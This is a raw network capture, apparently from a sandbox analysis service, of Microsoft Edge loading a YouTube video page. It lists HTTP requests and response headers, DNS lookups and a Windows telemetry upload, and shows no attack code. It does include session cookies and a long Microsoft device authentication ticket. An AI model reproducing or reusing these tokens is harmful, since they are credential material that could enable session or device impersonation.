p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
content-encoding: br
server: ESF
x-xss-protection: 0
set-cookie: GPS=1; Domain=.youtube.com; Expires=Fri, 26-Apr-2024 07:00:45 GMT; Path=/; Secure; HttpOnly
set-cookie: YSC=JkmurakeuKo; Domain=.youtube.com; Path=/; Secure; HttpOnly
set-cookie: VISITOR_INFO1_LIVE=OgPF78F-YOs; Domain=.youtube.com; Expires=Wed, 23-Oct-2024 06:30:45 GMT; Path=/; Secure; HttpOnly
set-cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D; Domain=.youtube.com; Expires=Wed, 23-Oct-2024 06:30:45 GMT; Path=/; Secure; HttpOnly
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://www.youtube.com/s/desktop/5e42dd8a/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.jsMicrosoftEdgeCP.exeRemote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js HTTP/2.0
host: www.youtube.com
accept: application/javascript, */*;q=0.8
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 15172
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:00:35 GMT
expires: Fri, 25 Apr 2025 14:00:35 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/javascript
vary: Accept-Encoding, Origin
age: 59410
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://www.youtube.com/s/desktop/5e42dd8a/jsbin/webcomponents-ce-sd.vflset/webcomponents-ce-sd.jsMicrosoftEdgeCP.exeRemote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/jsbin/webcomponents-ce-sd.vflset/webcomponents-ce-sd.js HTTP/2.0
host: www.youtube.com
accept: application/javascript, */*;q=0.8
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 27811
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:16:01 GMT
expires: Fri, 25 Apr 2025 14:16:01 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/javascript
vary: Accept-Encoding, Origin
age: 58484
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://www.youtube.com/s/desktop/5e42dd8a/jsbin/intersection-observer.min.vflset/intersection-observer.min.jsMicrosoftEdgeCP.exeRemote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/jsbin/intersection-observer.min.vflset/intersection-observer.min.js HTTP/2.0
host: www.youtube.com
accept: application/javascript, */*;q=0.8
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 2090
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:00:35 GMT
expires: Fri, 25 Apr 2025 14:00:35 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/javascript
vary: Accept-Encoding, Origin
age: 59410
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://www.youtube.com/s/desktop/5e42dd8a/jsbin/scheduler.vflset/scheduler.jsMicrosoftEdgeCP.exeRemote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/jsbin/scheduler.vflset/scheduler.js HTTP/2.0
host: www.youtube.com
accept: application/javascript, */*;q=0.8
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 3702
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:00:35 GMT
expires: Fri, 25 Apr 2025 14:00:35 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/javascript
vary: Accept-Encoding, Origin
age: 59411
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://www.youtube.com/s/desktop/5e42dd8a/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.jsMicrosoftEdgeCP.exeRemote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js HTTP/2.0
host: www.youtube.com
accept: application/javascript, */*;q=0.8
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 1670
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:00:35 GMT
expires: Fri, 25 Apr 2025 14:00:35 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/javascript
vary: Accept-Encoding, Origin
age: 59411
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:172.217.169.14:443RequestGET /s/player/652ba3a2/www-player.css HTTP/2.0
host: www.youtube.com
accept: text/css, */*
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 48109
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 24 Apr 2024 07:31:41 GMT
expires: Thu, 24 Apr 2025 07:31:41 GMT
cache-control: public, max-age=31536000
last-modified: Wed, 24 Apr 2024 04:20:05 GMT
content-type: text/css
vary: Accept-Encoding, Origin
age: 169145
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://www.youtube.com/s/desktop/5e42dd8a/cssbin/www-main-desktop-watch-page-skeleton.cssMicrosoftEdgeCP.exeRemote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/cssbin/www-main-desktop-watch-page-skeleton.css HTTP/2.0
host: www.youtube.com
accept: text/css, */*
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
accept-ranges: bytes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 809632
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 24 Apr 2024 07:32:42 GMT
expires: Thu, 24 Apr 2025 07:32:42 GMT
cache-control: public, max-age=31536000
last-modified: Wed, 24 Apr 2024 04:20:05 GMT
content-type: text/javascript
vary: Accept-Encoding, Origin
age: 169084
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://www.youtube.com/s/desktop/5e42dd8a/cssbin/www-main-desktop-player-skeleton.cssMicrosoftEdgeCP.exeRemote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/cssbin/www-main-desktop-player-skeleton.css HTTP/2.0
host: www.youtube.com
accept: text/css, */*
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 1508
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:08:14 GMT
expires: Fri, 25 Apr 2025 14:08:14 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/css
vary: Accept-Encoding, Origin
age: 58952
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/cssbin/www-onepick.css HTTP/2.0
host: www.youtube.com
accept: text/css, */*
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
accept-ranges: bytes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 1597273
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:00:35 GMT
expires: Fri, 25 Apr 2025 14:00:35 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/javascript
vary: Accept-Encoding, Origin
age: 59411
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.FLFMQpi63qc.L.X.O/am=AECAFg/d=0/br=1/rs=AGKMywH7OenIozOPso_R4eAze85u9ntbZgMicrosoftEdgeCP.exeRemote address:172.217.169.14:443RequestGET /s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.FLFMQpi63qc.L.X.O/am=AECAFg/d=0/br=1/rs=AGKMywH7OenIozOPso_R4eAze85u9ntbZg HTTP/2.0
host: www.youtube.com
accept: text/css, */*
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 5585
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:00:35 GMT
expires: Fri, 25 Apr 2025 14:00:35 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/javascript
vary: Accept-Encoding, Origin
age: 59411
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:172.217.169.14:443RequestGET /s/player/652ba3a2/player_ias.vflset/en_US/base.js HTTP/2.0
host: www.youtube.com
accept: application/javascript, */*;q=0.8
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 13649
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:00:35 GMT
expires: Fri, 25 Apr 2025 14:00:35 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/javascript
vary: Accept-Encoding, Origin
age: 59411
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/jsbin/spf.vflset/spf.js HTTP/2.0
host: www.youtube.com
accept: application/javascript, */*;q=0.8
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 240
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:08:13 GMT
expires: Fri, 25 Apr 2025 14:08:13 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/css
vary: Accept-Encoding, Origin
age: 58953
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/jsbin/network.vflset/network.js HTTP/2.0
host: www.youtube.com
accept: application/javascript, */*;q=0.8
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 625
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:08:17 GMT
expires: Fri, 25 Apr 2025 14:08:17 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/css
vary: Accept-Encoding, Origin
age: 58949
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://www.youtube.com/s/desktop/5e42dd8a/jsbin/desktop_polymer.vflset/desktop_polymer.jsMicrosoftEdgeCP.exeRemote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/jsbin/desktop_polymer.vflset/desktop_polymer.js HTTP/2.0
host: www.youtube.com
accept: application/javascript, */*;q=0.8
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; YSC=JkmurakeuKo; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D
ResponseHTTP/2.0 200
content-encoding: br
content-security-policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/youtube-main-app-web-scs-key
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="youtube-main-app-web-scs-key"
report-to: {"group":"youtube-main-app-web-scs-key","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube-main-app-web-scs-key"}]}
content-length: 235461
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:42:27 GMT
expires: Fri, 25 Apr 2025 14:42:27 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 03:13:25 GMT
content-type: text/css; charset=UTF-8
vary: Accept-Encoding
age: 56899
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Request14.169.217.172.in-addr.arpaIN PTRResponse14.169.217.172.in-addr.arpaIN PTRlhr25s26-in-f141e100net
-
Remote address:8.8.8.8:53Request195.187.250.142.in-addr.arpaIN PTRResponse195.187.250.142.in-addr.arpaIN PTRlhr25s33-in-f31e100net
-
Remote address:8.8.8.8:53Requesti.ytimg.comIN AResponsei.ytimg.comIN A142.250.178.22i.ytimg.comIN A172.217.16.246i.ytimg.comIN A142.250.200.22i.ytimg.comIN A142.250.200.54i.ytimg.comIN A216.58.201.118i.ytimg.comIN A216.58.204.86i.ytimg.comIN A172.217.169.54i.ytimg.comIN A142.250.179.246i.ytimg.comIN A142.250.180.22i.ytimg.comIN A142.250.187.214i.ytimg.comIN A142.250.187.246
-
Remote address:142.250.178.22:443RequestGET /generate_204 HTTP/2.0
host: i.ytimg.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
ResponseHTTP/2.0 204
cross-origin-resource-policy: cross-origin
date: Fri, 26 Apr 2024 06:30:47 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Request22.178.250.142.in-addr.arpaIN PTRResponse22.178.250.142.in-addr.arpaIN PTRlhr48s27-in-f221e100net
-
Remote address:8.8.8.8:53Request234.16.217.172.in-addr.arpaIN PTRResponse234.16.217.172.in-addr.arpaIN PTRmad08s04-in-f101e100net234.16.217.172.in-addr.arpaIN PTRlhr48s28-in-f10�I
-
Remote address:8.8.8.8:53Request227.212.58.216.in-addr.arpaIN PTRResponse227.212.58.216.in-addr.arpaIN PTRams16s22-in-f31e100net227.212.58.216.in-addr.arpaIN PTRams16s22-in-f227�H227.212.58.216.in-addr.arpaIN PTRlhr25s28-in-f3�H
-
Remote address:8.8.8.8:53Request227.212.58.216.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request227.212.58.216.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request50.251.17.2.in-addr.arpaIN PTRResponse50.251.17.2.in-addr.arpaIN PTRa2-17-251-50deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request22.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwatson.telemetry.microsoft.comIN AResponsewatson.telemetry.microsoft.comIN CNAMEblobcollector.events.data.trafficmanager.netblobcollector.events.data.trafficmanager.netIN CNAMEonedsblobprdeus15.eastus.cloudapp.azure.comonedsblobprdeus15.eastus.cloudapp.azure.comIN A20.42.73.29
-
Remote address:20.42.73.29:443RequestPOST /Telemetry.Request HTTP/1.1
Connection: Keep-Alive
User-Agent: MSDW
MSA_DeviceTicket: t=EwC4AlN5BAAUIUShNzVa+rgHy/M+tY/dQyCg+nEAAfaPerUlf3WdURFVySZwCd/iOsIGp15PfQorNdnT2VjM+1eaEHIdgmIgYymOIQaugHpqmei108Im9OL2zyNzv0yJNQQTPhMAYXCz1gJru2p2s0gHLM7ssR+p6NqP8K0xxlVtadH/QChysBlEUtyS9YfpHIlIvUWekRA0V/dpu7u/1atrrV3qNf1HHCNeDbySG5QW/KZPM6yEhruBB+GdlBnCJLQ5BdWSVHObOu9NXpu3190bOALF+Bf4acvd18zbfH7jc7i0kkTCXnvcPPO05qG0OOWxHl6ZNsp/Jt793ChBXWrlomWT+ETdxYBc1711zhYfopOKdrN8amKhBRIg2xgDZgAACJKd2UjGlakxiAHbwU3cZzddLWUV5qAUWgwVsdnsdVG9uGbnVG7+w5GyZrTgFLg8KqiIvJWQlqerXoViXXqbpAi3aiVgeU2zqcL4FCpu9uxMlVgyg8HqEj2Jx/iOMF9HaQluEYwYf++GW/jcpcJG9mc1FyISmKydVR8hEsfXY3tZ/LcxtHax3ufWJEFnLHwe+v0IlxbgbXwG2/Xy9jML+w19CpALno3ASEo4JADcsGz2YQxqId+d4OtBGju2PFXgH2ZQbgG6q7qCKW4Lz/KUppwUgHww5Qr5FtSElAHu4+6B60oNuEn8t7MMcTdF2NRx4emVrYqW7z+xa5ELT20ZLGA1oY6wImqmtYCaXizwBZQIXZkV8V2pE+637EdOAxdCHFl2JQf72A1oOCwTC+iyCyMzF8iaQGxg5BZd7iBb9VPvaowpeKpYFNZyimOjYInUMVwO2P/JwJeKfxYxp/O3Drf+RV62NrD9Tcu/Q959BpG0OFmZdidmt6OJERPKOHHpZUA7lMG2J90duUPZfqst1LpyVrgB&p=
AAD_TenantId: (null)
Content-Length: 4625
Host: watson.telemetry.microsoft.com
ResponseHTTP/1.1 200 200 OK
Content-Type: text/xml
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
Date: Fri, 26 Apr 2024 06:30:53 GMT
-
Remote address:8.8.8.8:53Request29.73.42.20.in-addr.arpaIN PTRResponse
-
Remote address:172.217.169.14:443RequestGET /watch?v=dQw4w9WgXcQ HTTP/2.0
host: www.youtube.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D; YSC=JkmurakeuKo
ResponseHTTP/2.0 200
x-content-type-options: nosniff
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Fri, 26 Apr 2024 06:30:56 GMT
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=31536000
report-to: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
cross-origin-opener-policy: same-origin-allow-popups; report-to="youtube_main"
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
origin-trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9
content-encoding: br
server: ESF
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://www.youtube.com/s/desktop/5e42dd8a/jsbin/desktop_polymer.vflset/desktop_polymer.jsMicrosoftEdgeCP.exeRemote address:172.217.169.14:443RequestGET /s/desktop/5e42dd8a/jsbin/desktop_polymer.vflset/desktop_polymer.js HTTP/2.0
host: www.youtube.com
accept: application/javascript, */*;q=0.8
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D; YSC=JkmurakeuKo
ResponseHTTP/2.0 200
accept-ranges: bytes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 1597273
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 25 Apr 2024 14:00:35 GMT
expires: Fri, 25 Apr 2025 14:00:35 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 25 Apr 2024 09:13:09 GMT
content-type: text/javascript
vary: Accept-Encoding, Origin
age: 59422
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Requestapis.google.comIN AResponseapis.google.comIN CNAMEplus.l.google.complus.l.google.comIN A216.58.201.110
-
Remote address:142.250.178.22:443RequestGET /generate_204 HTTP/2.0
host: i.ytimg.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
